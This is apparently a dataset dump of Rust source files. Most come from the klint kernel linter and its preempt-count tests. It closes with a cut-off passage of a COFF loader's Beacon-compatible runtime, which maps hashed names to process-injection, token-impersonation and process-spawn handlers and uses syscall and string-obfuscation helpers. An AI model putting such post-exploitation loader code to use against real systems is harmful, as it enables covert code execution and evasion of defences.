fn source_info_for_index(data: &BasicBlockData<'_>, loc: Location) -> SourceInfo {
match data.statements.get(loc.statement_index) {
Some(stmt) => stmt.source_info,
None => data.terminator().source_info,
}
}
pub(crate) fn source_info_for_location(&self, body: &Body<'tcx>, loc: Location) -> SourceInfo {
let data = self.block(body, loc.block);
Self::source_info_for_index(data, loc)
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/diagnostic_items/out_of_band.rs | src/diagnostic_items/out_of_band.rs | //! Out-of-band attributes attached without source code changes.
use rustc_hir::def_id::{DefId, LOCAL_CRATE};
use rustc_hir::diagnostic_items::DiagnosticItems;
use rustc_middle::middle::exported_symbols::ExportedSymbol;
use rustc_middle::ty::TyCtxt;
pub fn infer_missing_items<'tcx>(tcx: TyCtxt<'tcx>, items: &mut DiagnosticItems) {
if !items.name_to_id.contains_key(&crate::symbol::build_error) {
if let Some(def_id) = infer_build_error_diagnostic_item(tcx) {
super::collect_item(tcx, items, crate::symbol::build_error, def_id);
}
}
}
pub fn infer_build_error_diagnostic_item<'tcx>(tcx: TyCtxt<'tcx>) -> Option<DefId> {
for exported in tcx.exported_non_generic_symbols(LOCAL_CRATE) {
if let ExportedSymbol::NonGeneric(def_id) = exported.0
&& exported.0.symbol_name_for_local_instance(tcx).name == "rust_build_error"
{
return Some(def_id);
}
}
None
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/diagnostic_items/mod.rs | src/diagnostic_items/mod.rs | mod out_of_band;
use std::sync::Arc;
use rustc_data_structures::fx::FxIndexMap;
use rustc_hir::CRATE_OWNER_ID;
use rustc_hir::def_id::{CrateNum, DefId, LOCAL_CRATE};
use rustc_hir::diagnostic_items::DiagnosticItems;
use rustc_middle::ty::TyCtxt;
use rustc_serialize::{Decodable, Encodable};
use rustc_span::{Span, Symbol};
use crate::ctxt::{AnalysisCtxt, QueryValueDecodable};
use crate::{attribute::KlintAttribute, ctxt::PersistentQuery};
#[derive(Diagnostic)]
#[diag(klint_duplicate_diagnostic_item_in_crate)]
struct DuplicateDiagnosticItemInCrate {
#[primary_span]
pub duplicate_span: Option<Span>,
#[note(klint_diagnostic_item_first_defined)]
pub orig_span: Option<Span>,
#[note]
pub different_crates: bool,
pub crate_name: Symbol,
pub orig_crate_name: Symbol,
pub name: Symbol,
}
fn report_duplicate_item(
tcx: TyCtxt<'_>,
name: Symbol,
original_def_id: DefId,
item_def_id: DefId,
) {
let orig_span = tcx.hir_span_if_local(original_def_id);
let duplicate_span = tcx.hir_span_if_local(item_def_id);
tcx.dcx().emit_err(DuplicateDiagnosticItemInCrate {
duplicate_span,
orig_span,
crate_name: tcx.crate_name(item_def_id.krate),
orig_crate_name: tcx.crate_name(original_def_id.krate),
different_crates: (item_def_id.krate != original_def_id.krate),
name,
});
}
fn collect_item(tcx: TyCtxt<'_>, items: &mut DiagnosticItems, name: Symbol, item_def_id: DefId) {
items.id_to_name.insert(item_def_id, name);
if let Some(original_def_id) = items.name_to_id.insert(name, item_def_id) {
if original_def_id != item_def_id {
report_duplicate_item(tcx, name, original_def_id, item_def_id);
}
}
}
memoize!(
pub fn klint_diagnostic_items<'tcx>(
cx: &AnalysisCtxt<'tcx>,
krate_num: CrateNum,
) -> Arc<DiagnosticItems> {
if krate_num != LOCAL_CRATE {
return cx
.sql_load::<klint_diagnostic_items>(krate_num)
.unwrap_or_default();
}
let mut items = DiagnosticItems::default();
let crate_items = cx.hir_crate_items(());
for owner in crate_items.owners().chain(std::iter::once(CRATE_OWNER_ID)) {
for attr in cx.klint_attributes(owner.into()).iter() {
if let KlintAttribute::DiagnosticItem(name) = *attr {
collect_item(cx.tcx, &mut items, name, owner.to_def_id());
}
}
}
out_of_band::infer_missing_items(cx.tcx, &mut items);
let ret = Arc::new(items);
cx.sql_store::<klint_diagnostic_items>(krate_num, ret.clone());
ret
}
);
impl QueryValueDecodable for klint_diagnostic_items {
fn encode_value<'tcx>(value: &Self::Value<'tcx>, cx: &mut crate::serde::EncodeContext<'tcx>) {
value.name_to_id.encode(cx);
}
fn decode_value<'a, 'tcx>(cx: &mut crate::serde::DecodeContext<'a, 'tcx>) -> Self::Value<'tcx> {
let name_to_id = FxIndexMap::decode(cx);
let id_to_name = name_to_id.iter().map(|(&name, &id)| (id, name)).collect();
Arc::new(DiagnosticItems {
name_to_id,
id_to_name,
})
}
}
impl PersistentQuery for klint_diagnostic_items {
type LocalKey<'tcx> = ();
fn into_crate_and_local<'tcx>(key: CrateNum) -> (CrateNum, Self::LocalKey<'tcx>) {
(key, ())
}
}
memoize!(
pub fn klint_all_diagnostic_items<'tcx>(cx: &AnalysisCtxt<'tcx>) -> Arc<DiagnosticItems> {
let mut items = DiagnosticItems::default();
for cnum in cx
.crates(())
.iter()
.copied()
.filter(|cnum| cx.is_user_visible_dep(*cnum))
.chain(std::iter::once(LOCAL_CRATE))
{
for (&name, &def_id) in &cx.klint_diagnostic_items(cnum).name_to_id {
collect_item(cx.tcx, &mut items, name, def_id);
}
}
Arc::new(items)
}
);
impl<'tcx> AnalysisCtxt<'tcx> {
pub fn get_klint_diagnostic_item(&self, name: Symbol) -> Option<DefId> {
self.klint_all_diagnostic_items()
.name_to_id
.get(&name)
.copied()
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/compile-test.rs | tests/compile-test.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
extern crate compiletest_rs as compiletest;
use std::env;
use std::path::PathBuf;
use std::sync::LazyLock;
static PROFILE_PATH: LazyLock<PathBuf> = LazyLock::new(|| {
let current_exe_path = env::current_exe().unwrap();
let deps_path = current_exe_path.parent().unwrap();
let profile_path = deps_path.parent().unwrap();
profile_path.into()
});
fn run_ui_tests(bless: bool) {
let mut config = compiletest::Config {
bless,
edition: Some("2024".into()),
mode: compiletest::common::Mode::Ui,
..Default::default()
};
config.target_rustcflags = Some(
[
"-Zcrate-attr=feature(register_tool)",
"-Zcrate-attr=register_tool(klint)",
"--crate-type=lib",
"-Zcrate-attr=no_std",
"--extern alloc",
"--emit=obj",
"-O",
"-Cdebuginfo=1",
"--cfg=CONFIG_FRAME_WARN=\"2048\"",
]
.join(" "),
);
config.src_base = "tests/ui".into();
config.build_base = PROFILE_PATH.join("test/ui");
config.rustc_path = PROFILE_PATH.join("klint");
config.link_deps(); // Populate config.target_rustcflags with dependencies on the path
compiletest::run_tests(&config);
}
#[test]
fn compile_test() {
let bless = env::var("BLESS").map_or(false, |x| !x.trim().is_empty());
run_ui_tests(bless);
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/dep/bin.rs | tests/dep/bin.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use spin::*;
fn main() {
let lock = Spinlock;
drop(lock);
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/dep/main.rs | tests/dep/main.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use std::env;
use std::path::PathBuf;
use std::sync::LazyLock;
static PROFILE_PATH: LazyLock<PathBuf> = LazyLock::new(|| {
let current_exe_path = env::current_exe().unwrap();
let deps_path = current_exe_path.parent().unwrap();
let profile_path = deps_path.parent().unwrap();
profile_path.into()
});
#[test]
fn run() {
std::process::exit(
std::process::Command::new("tests/dep/run.sh")
.env("KLINT", PROFILE_PATH.join("klint"))
.status()
.unwrap()
.code()
.unwrap(),
);
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/dep/spin.rs | tests/dep/spin.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
pub struct Guard;
impl Drop for Guard {
#[klint::preempt_count(adjust = -1, unchecked)]
fn drop(&mut self) {}
}
pub struct Spinlock;
impl Spinlock {
#[klint::preempt_count(adjust = 1, unchecked)]
pub fn lock(&self) -> Guard {
Guard
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/obligation-resolution.rs | tests/ui/obligation-resolution.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
// This is a regression test which is minimize from ICE when compiling libcore.
pub trait Pattern: Sized {
#[inline]
fn strip_prefix_of(self, _haystack: &str) -> Option<&str> {
let _ = &0;
None
}
}
#[doc(hidden)]
trait MultiCharEq {
}
impl<const N: usize> MultiCharEq for [char; N] {
}
struct MultiCharEqPattern<C: MultiCharEq>(C);
impl<C: MultiCharEq> Pattern for MultiCharEqPattern<C> {
}
impl<const N: usize> Pattern for [char; N] {
#[inline]
fn strip_prefix_of(self, haystack: &str) -> Option<&str> {
MultiCharEqPattern(self).strip_prefix_of(haystack)
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/iflet.rs | tests/ui/iflet.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
pub struct X;
impl Drop for X {
#[klint::preempt_count(expect = 0)]
#[inline(never)]
fn drop(&mut self) {}
}
#[klint::preempt_count(expect = 0..)]
pub fn foo(x: Option<X>) -> Option<X> {
// This control flow only conditionally moved `x`, but it will need dropping anymore
// regardless if this branch is taken.
// It's important that we do not consider the destructor to possibly run at the end of scope.
if let Some(x) = x {
return Some(x);
}
None
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/calltrace.rs | tests/ui/calltrace.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use alloc::vec::Vec;
struct LockOnDrop;
impl Drop for LockOnDrop {
#[klint::preempt_count(adjust = 1, unchecked)]
fn drop(&mut self) {}
}
#[klint::preempt_count(expect = 0)]
fn might_sleep() {}
fn problematic<T>(x: T) {
drop(x);
might_sleep();
}
fn wrapper<T>(x: T) {
problematic(x);
}
pub fn this_is_fine() {
wrapper(Vec::<i32>::new());
}
pub fn this_is_not() {
wrapper(LockOnDrop);
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/box_free.rs | tests/ui/box_free.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
#![feature(allocator_api)]
use alloc::boxed::Box;
use core::alloc::{AllocError, Allocator, Layout};
use core::ptr::NonNull;
struct TestAllocator;
unsafe impl Allocator for TestAllocator {
#[inline]
fn allocate(&self, layout: Layout) -> Result<NonNull<[u8]>, AllocError> {
panic!();
}
#[inline]
#[klint::preempt_count(expect = 0)]
unsafe fn deallocate(&self, ptr: NonNull<u8>, layout: Layout) {}
}
struct SleepAndLockOnDrop;
impl Drop for SleepAndLockOnDrop {
#[klint::preempt_count(adjust = 1, expect = 0, unchecked)]
fn drop(&mut self) {}
}
fn drop_box(x: Box<SleepAndLockOnDrop, TestAllocator>) {}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/stack_frame_size.rs | tests/ui/stack_frame_size.rs | #![deny(klint::stack_frame_too_large)]
#[unsafe(no_mangle)]
fn very_large_frame() {
core::hint::black_box([0; 1024]);
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/drop-array.rs | tests/ui/drop-array.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use alloc::boxed::Box;
struct LockOnDrop;
impl Drop for LockOnDrop {
#[klint::preempt_count(adjust = 1, unchecked)]
fn drop(&mut self) {}
}
struct SleepOnDrop;
impl Drop for SleepOnDrop {
#[klint::preempt_count(expect = 0)]
fn drop(&mut self) {}
}
struct SleepAndLockOnDrop;
impl Drop for SleepAndLockOnDrop {
#[klint::preempt_count(adjust = 1, expect = 0, unchecked)]
fn drop(&mut self) {}
}
#[klint::report_preempt_count]
fn drop_lock(x: Box<[LockOnDrop; 2]>) {}
#[klint::report_preempt_count]
fn drop_sleep(x: Box<[SleepOnDrop; 2]>) {}
fn drop_sleep_and_lock(x: Box<[SleepAndLockOnDrop; 2]>) {}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/function-pointer.rs | tests/ui/function-pointer.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
#[klint::preempt_count(adjust = 1, unchecked)]
fn spin_lock() {}
fn okay() {
}
fn not_okay() {
spin_lock();
}
#[klint::preempt_count(adjust = 0)]
pub fn good() {
let a: fn() = okay;
a();
}
#[klint::preempt_count(adjust = 0)]
pub fn bad() {
let a: fn() = not_okay;
a();
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/annotation.rs | tests/ui/annotation.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
#[klint::preempt_count]
fn a() {}
#[klint::preempt_count()]
fn b() {}
#[klint::preempt_count(adjust = )]
fn c() {}
#[klint::preempt_count(expect = )]
fn d() {}
#[klint::preempt_count(expect = ..)]
fn e() {}
#[klint::preempt_count(unchecked)]
fn f() {}
#[klint::any_context]
fn g() {}
#[klint::atomic_context]
fn h() {}
#[klint::atomic_context_only]
fn i() {}
#[klint::process_context]
fn j() {}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/infinite_recursion.rs | tests/ui/infinite_recursion.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
trait ToOpt: Sized {
fn to_option(&self) -> Option<Self>;
}
impl ToOpt for usize {
fn to_option(&self) -> Option<usize> {
Some(*self)
}
}
impl<T:Clone> ToOpt for Option<T> {
fn to_option(&self) -> Option<Option<T>> {
Some((*self).clone())
}
}
fn function<T:ToOpt + Clone>(counter: usize, t: T) {
if counter > 0 {
function(counter - 1, t.to_option());
//~^ ERROR reached the recursion limit while instantiating `function::<Option<
}
}
pub fn main() {
function(22, 22);
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/recursion.rs | tests/ui/recursion.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use alloc::sync::Arc;
#[klint::preempt_count(expect = 0)]
fn might_sleep() {}
#[klint::preempt_count(expect = 0)]
fn recursive_might_sleep() {
if false {
recursive_might_sleep();
}
might_sleep();
}
fn recursive_might_sleep_unannotated() {
if false {
recursive_might_sleep_unannotated();
}
might_sleep();
}
#[klint::drop_preempt_count(expect = 0)]
struct Recursive {
a: Option<Arc<Recursive>>,
}
impl Drop for Recursive {
fn drop(&mut self) {
might_sleep();
}
}
fn drop_recur(recur: Arc<Recursive>) {}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/upcasting.rs | tests/ui/upcasting.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
#[klint::drop_preempt_count(expect = 0)]
trait A {}
#[klint::drop_preempt_count(expect = 1)]
trait B: A {}
fn upcast(x: &dyn B) -> &dyn A {
x
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/build_error.rs | tests/ui/build_error.rs | unsafe extern "C" {
#[klint::diagnostic_item = "build_error"]
safe fn rust_build_error();
}
macro_rules! build_assert {
($expr:expr) => {
if !$expr {
rust_build_error();
}
}
}
#[inline]
fn inline_call() {
build_assert!(false);
}
#[unsafe(no_mangle)]
fn gen_build_error() {
inline_call();
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/waker.rs | tests/ui/waker.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
#[klint::preempt_count(expect = 0..)]
fn waker_ops(x: &core::task::Waker) {
x.clone().wake();
x.wake_by_ref();
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/vtable.rs | tests/ui/vtable.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use alloc::boxed::Box;
#[klint::preempt_count(adjust = 1, unchecked)]
fn spin_lock() {}
trait MyTrait {
fn foo(&self);
}
struct Good;
impl MyTrait for Good {
fn foo(&self) {}
}
#[klint::preempt_count(adjust = 0)]
pub fn good() {
let a: &'static dyn MyTrait = &Good;
a.foo();
}
struct Bad;
impl MyTrait for Bad {
fn foo(&self) {
spin_lock();
}
}
#[klint::preempt_count(adjust = 0)]
pub fn bad() {
let a: &'static dyn MyTrait = &Bad;
a.foo();
}
struct BadDrop;
impl MyTrait for BadDrop {
fn foo(&self) {}
}
impl Drop for BadDrop {
fn drop(&mut self) {
spin_lock();
}
}
#[klint::preempt_count(adjust = 0)]
pub fn bad_drop() {
let _a: Box<dyn MyTrait> = Box::new(BadDrop);
}
trait AnnotatedTrait {
#[klint::preempt_count(adjust = 1)]
fn foo(&self);
}
struct AnnotatedGood;
impl AnnotatedTrait for AnnotatedGood {
fn foo(&self) {
spin_lock();
}
}
#[klint::preempt_count(adjust = 1)]
pub fn annotated_good() {
let a: &'static dyn AnnotatedTrait = &AnnotatedGood;
a.foo();
}
struct AnnotatedBad;
impl AnnotatedTrait for AnnotatedBad {
fn foo(&self) {}
}
#[klint::preempt_count(adjust = 1)]
pub fn annotated_bad() {
let a: &'static dyn AnnotatedTrait = &AnnotatedBad;
a.foo();
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/adjustment.rs | tests/ui/adjustment.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
struct Guard;
impl Drop for Guard {
#[klint::preempt_count(adjust = -1, unchecked)]
fn drop(&mut self) {}
}
struct Spinlock;
impl Spinlock {
#[klint::preempt_count(adjust = 1, unchecked)]
fn lock(&self) -> Guard {
Guard
}
}
fn test() {
let lock = Spinlock;
if true {
core::mem::forget(lock.lock());
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/drop-slice.rs | tests/ui/drop-slice.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use alloc::boxed::Box;
struct LockOnDrop;
impl Drop for LockOnDrop {
#[klint::preempt_count(adjust = 1, unchecked)]
fn drop(&mut self) {}
}
struct SleepOnDrop;
impl Drop for SleepOnDrop {
#[klint::preempt_count(expect = 0)]
fn drop(&mut self) {}
}
fn drop_lock(x: Box<[LockOnDrop]>) {}
#[klint::report_preempt_count]
fn drop_sleep(x: Box<[SleepOnDrop]>) {}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
joaoviictorti/coffeeldr | https://github.com/joaoviictorti/coffeeldr/blob/45fcea8c7145e4d4afa2fe59950cbb491f80dbc3/src/beacon.rs | src/beacon.rs | use alloc::{
string::{String, ToString},
vec::Vec,
};
use core::{
alloc::Layout,
ffi::{CStr, c_void},
ffi::{c_char, c_int, c_short},
fmt,
ptr::{self, null_mut},
};
use spin::Mutex;
use obfstr::obfstr as s;
use dinvk::{winapis::NtCurrentProcess, syscall};
use dinvk::{types::OBJECT_ATTRIBUTES, hash::jenkins3};
use windows_sys::Win32::{
Security::*,
Foundation::{CloseHandle, HANDLE, STATUS_SUCCESS},
System::{
Threading::*,
WindowsProgramming::CLIENT_ID,
Memory::{
MEM_COMMIT,
MEM_RESERVE,
PAGE_EXECUTE_READWRITE
},
},
};
use crate::error::{CoffeeLdrError, Result};
/// Global output buffer used by Beacon-compatible functions.
static BEACON_BUFFER: Mutex<BeaconOutputBuffer> = Mutex::new(BeaconOutputBuffer::new());
/// A buffer used for managing and collecting output for the beacon.
#[repr(C)]
#[derive(Debug, Clone)]
pub struct BeaconOutputBuffer {
/// Internal buffer that stores the output data as a vector of `c_char`.
pub buffer: Vec<c_char>,
}
impl BeaconOutputBuffer {
/// Creates a new empty output buffer.
const fn new() -> Self {
Self { buffer: Vec::new() }
}
/// Appends raw C-style bytes to the internal buffer.
///
/// Invalid pointers or negative lengths are ignored.
fn append_char(&mut self, s: *mut c_char, len: c_int) {
if s.is_null() || len <= 0 {
return;
}
let tmp = unsafe { core::slice::from_raw_parts(s, len as usize) };
self.buffer.extend_from_slice(tmp);
}
/// Appends plain Rust text to the buffer.
fn append_string(&mut self, s: &str) {
self.buffer.extend(s.bytes().map(|b| b as c_char));
}
/// Returns the current buffer pointer and size, and clears the buffer.
///
/// This behaves exactly like the Beacon BOF runtime.
fn get_output(&mut self) -> (*mut c_char, usize) {
let size = self.buffer.len();
let ptr = self.buffer.as_mut_ptr();
self.buffer.clear();
(ptr, size)
}
/// Clears all output data stored in the buffer.
pub fn clear(&mut self) {
self.buffer.clear();
}
}
impl fmt::Display for BeaconOutputBuffer {
/// Converts the internal buffer into a Rust `String`.
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
let string = self
.buffer
.iter()
.map(|&c| if c as u8 == 0 { '\n' } else { c as u8 as char })
.collect::<String>();
write!(f, "{string}")
}
}
#[repr(C)]
#[derive(Debug, Clone, Copy)]
struct Data {
/// The original buffer.
original: *mut c_char,
/// Current pointer into our buffer.
buffer: *mut c_char,
/// Remaining length of data.
length: c_int,
/// Total size of this buffer.
size: c_int,
}
#[repr(C)]
#[derive(Debug, Clone, Copy)]
struct Format {
/// The original buffer.
original: *mut c_char,
/// Current pointer into our buffer.
buffer: *mut c_char,
/// Remaining length of data.
length: c_int,
/// Total size of this buffer.
size: c_int,
}
/// Resolves the internal address of a built-in Beacon function.
///
/// The lookup uses a Jenkins hash of the symbol name to match the
/// internal function used by BOF payloads.
///
/// # Errors
///
/// Fails when the requested function is not mapped to any known internal handler.
pub fn get_function_internal_address(name: &str) -> Result<usize> {
match jenkins3(name) {
// Output
3210322847u32 => Ok(beacon_printf as *const () as usize),
358755801u32 => Ok(beacon_output as *const () as usize),
2979319955u32 => Ok(beacon_get_output_data as *const () as usize),
// Token
3202664826u32 => Ok(beacon_is_admin as *const () as usize),
233171701u32 => Ok(beacon_use_token as *const () as usize),
2754379686u32 => Ok(beacon_rever_token as *const () as usize),
// Format
1870274128u32 => Ok(beacon_format_int as *const () as usize),
1617256401u32 => Ok(beacon_format_free as *const () as usize),
687949845u32 => Ok(beacon_format_alloc as *const () as usize),
305071883u32 => Ok(beacon_format_reset as *const () as usize),
2824797381u32 => Ok(beacon_formt_printf as *const () as usize),
814630661u32 => Ok(beacon_format_append as *const () as usize),
2821454172u32 => Ok(beacon_format_to_string as *const () as usize),
// Process / injection
3748796315u32 => Ok(beacon_get_spawn_to as *const () as usize),
1991785755u32 => Ok(beacon_inject_process as *const () as usize),
2335479872u32 => Ok(beacon_cleanup_process as *const () as usize),
2755057638u32 => Ok(beacon_spawn_temporary_process as *const () as usize),
131483084u32 => Ok(beacon_inject_temporary_process as *const () as usize),
// Data
1942020652u32 => Ok(beacon_data_int as *const () as usize),
1136370979u32 => Ok(beacon_data_short as *const () as usize),
709123669u32 => Ok(beacon_data_parse as *const () as usize),
2194280572u32 => Ok(beacon_data_length as *const () as usize),
596399976u32 => Ok(beacon_data_extract as *const () as usize),
275872794u32 => Ok(beacon_data_ptr as *const () as usize),
// Utils
2580203873u32 => Ok(to_wide_char as *const () as usize),
3816160102u32 => Ok(0),
_ => Err(CoffeeLdrError::FunctionInternalNotFound(name.to_string())),
}
}
/// Retrieves the current Beacon output buffer.
///
/// If no output has been produced, returns `None`.
/// Otherwise returns a cloned snapshot and clears the internal buffer.
pub fn get_output_data() -> Option<BeaconOutputBuffer> {
let mut beacon = BEACON_BUFFER.lock();
if beacon.buffer.is_empty() {
return None;
}
let output = beacon.clone();
beacon.clear();
Some(output)
}
/// Allocates a new `Format` buffer for Beacon-formatting operations.
///
/// Allocation uses zeroed memory and behaves like the standard BOF runtime.
fn beacon_format_alloc(format: *mut Format, max: c_int) {
if format.is_null() || max == 0 {
return;
}
let layout_result = Layout::from_size_align(max as usize, Layout::new::<i8>().align());
if let Ok(layout) = layout_result {
unsafe {
let original = alloc::alloc::alloc_zeroed(layout).cast::<i8>();
(*format).original = original;
(*format).buffer = original;
(*format).length = 0;
(*format).size = max;
}
}
}
/// Clears the contents of a `Format` buffer by zeroing it.
///
/// The pointer is reset back to the beginning.
fn beacon_format_reset(format: *mut Format) {
if format.is_null() {
return;
}
unsafe {
ptr::write_bytes((*format).original, 0, (*format).size as usize);
(*format).buffer = (*format).original;
(*format).length = (*format).size;
}
}
/// Converts the contents of a `Format` buffer into a C-style string.
///
/// Returns a pointer to the underlying buffer.
fn beacon_format_to_string(format: *mut Format, size: *mut c_int) -> *mut c_char {
if format.is_null() || size.is_null() {
return null_mut();
}
unsafe {
(*size) = (*format).length;
(*format).original
}
}
/// Appends a big-endian integer to the format buffer.
fn beacon_format_int(format: *mut Format, value: c_int) {
if format.is_null() {
return;
}
unsafe {
if (*format).length + 4 > (*format).size {
return;
}
let outdata = swap_endianness(value as u32).to_be_bytes();
ptr::copy_nonoverlapping(outdata.as_ptr(), (*format).buffer as *mut u8, 4);
(*format).buffer = (*format).buffer.add(4);
(*format).length += 4;
}
}
/// Appends arbitrary raw bytes to a `Format` buffer.
fn beacon_format_append(format: *mut Format, text: *const c_char, len: c_int) {
if format.is_null() || text.is_null() || len <= 0 {
return;
}
unsafe {
if (*format).length + len > (*format).size {
return;
}
ptr::copy_nonoverlapping(text, (*format).buffer, len as usize);
(*format).buffer = (*format).buffer.add(len as usize);
(*format).length += len;
}
}
/// Frees the memory associated with a `Format` buffer.
fn beacon_format_free(format: *mut Format) {
